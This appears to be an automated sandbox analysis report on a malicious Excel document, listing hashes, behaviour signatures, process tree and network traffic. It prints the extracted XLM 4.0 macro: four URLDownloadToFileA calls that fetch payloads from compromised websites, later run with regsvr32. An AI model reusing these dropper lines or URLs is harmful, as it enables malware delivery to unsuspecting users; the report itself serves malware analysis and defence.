Analysis

  • max time kernel
    129s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64
    arch:x86
    image:win10-20220812-en
    locale:en-us
    os:windows10-1703-x64
    system
  • submitted
    04/11/2022, 05:30 UTC

General

  • Target

    b13a80ec8064a62693a6ac15180a6cbd48e3c0bef89be2f7c525258efc350067.xls

  • Size

    217KB

  • MD5

    dab2910a25d6f162a6d723f803ed0416

  • SHA1

    91fa3e449d1f226da2e265720afd7bd3c8debe74

  • SHA256

    b13a80ec8064a62693a6ac15180a6cbd48e3c0bef89be2f7c525258efc350067

  • SHA512

    c34c835113029a5bbc34508513de353958a217ec15e598fc83c79909fc20740d8493380c821277c452b871e78ce2f2f432bd216ccaba121814b7955ee11ea5b2

  • SSDEEP

    6144:zKpb8rGYrMPe3q7Q0XV5xtuEsi8/dglyY+TAQXTHGUMEyP5p6f5jQmo:JbGUMVWlbo

Score
10/10

Malware Config

Extracted

Language: xlm4.0

Source:

  1. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/", "..\oxnv1.ooccxx")
  2. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/", "..\oxnv2.ooccxx")
  3. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://armannahalpersian.ir/3H5qqUOB/", "..\oxnv3.ooccxx")
  4. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://alagi.ge/application/irnz5Rs8qWvQrf/", "..\oxnv4.ooccxx")
URLs

  • xlm40.dropper: http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/
  • xlm40.dropper: http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/
  • xlm40.dropper: http://armannahalpersian.ir/3H5qqUOB/
  • xlm40.dropper: http://alagi.ge/application/irnz5Rs8qWvQrf/

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b13a80ec8064a62693a6ac15180a6cbd48e3c0bef89be2f7c525258efc350067.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3104
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:3816
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:4736
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:3336
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:2952

Network

  • DNS (EXCEL.EXE, remote address 8.8.8.8:53)
    Request: aquariorecords.com.br IN A
    Response: aquariorecords.com.br IN A 100.126.19.237
  • GET http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/ (EXCEL.EXE, remote address 100.126.19.237:80)
    Request
    GET /wp-content/A8G3ownNApEj1L4hF/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: aquariorecords.com.br
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • DNS (EXCEL.EXE, remote address 8.8.8.8:53)
    Request: ftp.pricoat.com.mx IN A
    Response: ftp.pricoat.com.mx IN A 100.90.51.226
  • GET http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/ (EXCEL.EXE, remote address 100.90.51.226:80)
    Request
    GET /Fichas/3ybJLLXu5zqqn8Sx/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ftp.pricoat.com.mx
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • DNS (EXCEL.EXE, remote address 8.8.8.8:53)
    Request: armannahalpersian.ir IN A
    Response: armannahalpersian.ir IN A 100.67.165.3
  • GET http://armannahalpersian.ir/3H5qqUOB/ (EXCEL.EXE, remote address 100.67.165.3:80)
    Request
    GET /3H5qqUOB/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: armannahalpersian.ir
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • DNS (EXCEL.EXE, remote address 8.8.8.8:53)
    Request: alagi.ge IN A
    Response: alagi.ge IN A 100.116.145.64
  • GET http://alagi.ge/application/irnz5Rs8qWvQrf/ (EXCEL.EXE, remote address 100.116.145.64:80)
    Request
    GET /application/irnz5Rs8qWvQrf/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: alagi.ge
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • 100.126.19.237:80 (http, EXCEL.EXE)
    Sent 836 B in 11 packets, received 368 B in 8 packets
    HTTP Request: GET http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/
    HTTP Response: 404
  • 100.90.51.226:80 (http, EXCEL.EXE)
    Sent 736 B in 9 packets, received 368 B in 8 packets
    HTTP Request: GET http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/
    HTTP Response: 404
  • 100.67.165.3:80 (http, EXCEL.EXE)
    Sent 723 B in 9 packets, received 368 B in 8 packets
    HTTP Request: GET http://armannahalpersian.ir/3H5qqUOB/
    HTTP Response: 404
  • 100.116.145.64:80 (http, EXCEL.EXE)
    Sent 729 B in 9 packets, received 368 B in 8 packets
    HTTP Request: GET http://alagi.ge/application/irnz5Rs8qWvQrf/
    HTTP Response: 404
  • 8.8.8.8:53 (dns, EXCEL.EXE)
    Sent 67 B in 1 packet, received 104 B in 1 packet
    DNS Request: aquariorecords.com.br
    DNS Response: 100.126.19.237
  • 8.8.8.8:53 (dns, EXCEL.EXE)
    Sent 64 B in 1 packet, received 98 B in 1 packet
    DNS Request: ftp.pricoat.com.mx
    DNS Response: 100.90.51.226
  • 8.8.8.8:53 (dns, EXCEL.EXE)
    Sent 66 B in 1 packet, received 102 B in 1 packet
    DNS Request: armannahalpersian.ir
    DNS Response: 100.67.165.3
  • 8.8.8.8:53 (dns, EXCEL.EXE)
    Sent 54 B in 1 packet, received 78 B in 1 packet
    DNS Request: alagi.ge
    DNS Response: 100.116.145.64

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3104-122-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-121-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-119-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-131-0x00007FFD28D90000-0x00007FFD28DA0000-memory.dmp (64KB)
  • memory/3104-132-0x00007FFD28D90000-0x00007FFD28DA0000-memory.dmp (64KB)
  • memory/3104-120-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-293-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-294-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-295-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
  • memory/3104-296-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp (64KB)
